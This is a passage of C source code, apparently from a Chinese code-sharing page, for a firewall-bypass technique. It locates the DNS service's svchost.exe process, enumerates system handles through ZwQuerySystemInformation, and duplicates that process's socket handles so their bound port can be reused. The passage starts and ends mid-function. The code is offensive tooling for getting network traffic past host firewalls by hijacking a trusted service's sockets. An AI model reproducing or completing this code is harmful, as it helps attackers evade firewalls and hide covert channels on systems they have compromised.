一种新的穿透防火墙的数据传输技术.htm
来自「穿防火墙源代码」· HTM 代码 · 共 544 行 · 第 1/3 页
HTM
544 行
)<br />
{<br />
wsprintf(szUserName, "%s", szUser);<br />
}<br />
else<br />
{<br />
return false;<br />
}<br />
<br />
return true;<br />
} <br />
<br />
<br />
/*++<br />
<br />
This routine is used to get the DNS process's Id<br />
<br />
Here, I use WTSEnumerateProcesses to get process user Sid, <br />
and then get the process user name. Beacause as it's a "NETWORK SERVICE", <br />
we cann't use OpenProcessToken to catch the DNS process's token information,<br />
even if we has the privilege in catching the SYSTEM's.<br />
<br />
--*/<br />
DWORD GetDNSProcessId()<br />
{<br />
PWTS_PROCESS_INFO pProcessInfo = NULL;<br />
DWORD ProcessCount = 0;<br />
char szUserName[255];<br />
DWORD Id = -1;<br />
<br />
if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))<br />
{<br />
// dump each process description<br />
for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++)<br />
{<br />
<br />
if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 )<br />
{<br />
GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);<br />
if( strcmp(szUserName, "NETWORK SERVICE") == 0)<br />
{<br />
Id = pProcessInfo[CurrentProcess].ProcessId;<br />
break;<br />
}<br />
}<br />
}<br />
<br />
WTSFreeMemory(pProcessInfo);<br />
}<br />
<br />
return Id;<br />
}<br />
<br />
<br />
/*++<br />
This doesn't work as we know, sign...<br />
but you can use the routine for other useing...<br />
--*/<br />
/*<br />
BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)<br />
{<br />
HANDLE hProcess = NULL, <br />
hAccessToken = NULL;<br />
TCHAR InfoBuffer[1000], szDomainName[200];<br />
PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;<br />
DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;<br />
SID_NAME_USE snu;<br />
<br />
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);<br />
if(hProcess == NULL)<br />
{<br />
printf("OpenProcess wrong");<br />
CloseHandle(hProcess);<br />
return false;<br />
}<br />
<br />
if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))<br />
{<br />
printf("OpenProcessToken wrong:%08x", GetLastError());<br />
return false;<br />
}<br />
<br />
GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,<br />
1000, &dwInfoBufferSize);<br />
<br />
LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,<br />
&dwAccountSize,szDomainName, &dwDomainSize, &snu);<br />
<br />
if(hProcess)<br />
CloseHandle(hProcess);<br />
if(hAccessToken)<br />
CloseHandle(hAccessToken);<br />
return true;<br />
}*/<br />
<br />
<br />
/*++<br />
Now, it is the most important stuff... ^_^<br />
--*/<br />
SOCKET GetSocketFromId (DWORD PID)<br />
{<br />
NTSTATUS status;<br />
PVOID buf = NULL;<br />
ULONG size = 1;<br />
ULONG NumOfHandle = 0;<br />
ULONG i;<br />
PSYSTEM_HANDLE_INFORMATION h_info = NULL;<br />
HANDLE sock = NULL;<br />
DWORD n;<br />
<br />
buf=malloc(0x1000);<br />
if(buf == NULL)<br />
{<br />
printf("malloc wrong\n");<br />
return NULL;<br />
}<br />
status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );<br />
if(STATUS_INFO_LENGTH_MISMATCH == status)<br />
{<br />
free(buf);<br />
buf=malloc(n);<br />
if(buf == NULL)<br />
{<br />
printf("malloc wrong\n");<br />
return NULL;<br />
}<br />
status = ZwQuerySystemInformation( 0x10, buf, n, NULL);<br />
}<br />
else<br />
{<br />
printf("ZwQuerySystemInformation wrong\n");<br />
return NULL;<br />
}<br />
<br />
NumOfHandle = *(ULONG*)buf;<br />
<br />
h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);<br />
<br />
for(i = 0; i<NumOfHandle ;i++)<br />
{<br />
try<br />
{<br />
if( ( h_info[i].ProcessId == PID ) && ( h_info[i].ObjectTypeNumber == 0x1c ) <br />
&& (h_info[i].Handle!=0x2c) // I don't know why if the Handle equal to 0x2c, in my test, it stops at getsockname()<br />
// So I jump over this situation... <br />
// May be it's different in your system, <br />
) //wind2000 is 0x1a<br />
{<br />
//printf("Handle:0x%x Type:%08x\n",h_info[i].Handle, h_info[i].ObjectTypeNumber);<br />
if( 0 == DuplicateHandle(<br />
OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID), <br />
(HANDLE)h_info[i].Handle, <br />
GetCurrentProcess(), <br />
&sock, <br />
STANDARD_RIGHTS_REQUIRED, <br />
true, <br />
DUPLICATE_SAME_ACCESS)<br />
)<br />
{<br />
printf("DuplicateHandle wrong:%8x", GetLastError());<br />
continue;<br />
}<br />
<br />
//printf("DuplicateHandle ok\n");<br />
sockaddr_in name = {0};<br />
name.sin_family = AF_INET;<br />
int namelen = sizeof(sockaddr_in);<br />
getsockname( (SOCKET)sock, (sockaddr*)&name, &namelen );<br />
//printf("PORT=%5d\n", ntohs( name.sin_port )); <br />
if(ntohs(name.sin_port)>0) // if port > 0, then we can use it<br />
break;<br />
}<br />
}<br />
catch(...)<br />
{<br />
continue;<br />
}<br />
}<br />
<br />
if ( buf != NULL )<br />
{<br />
free( buf );<br />
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?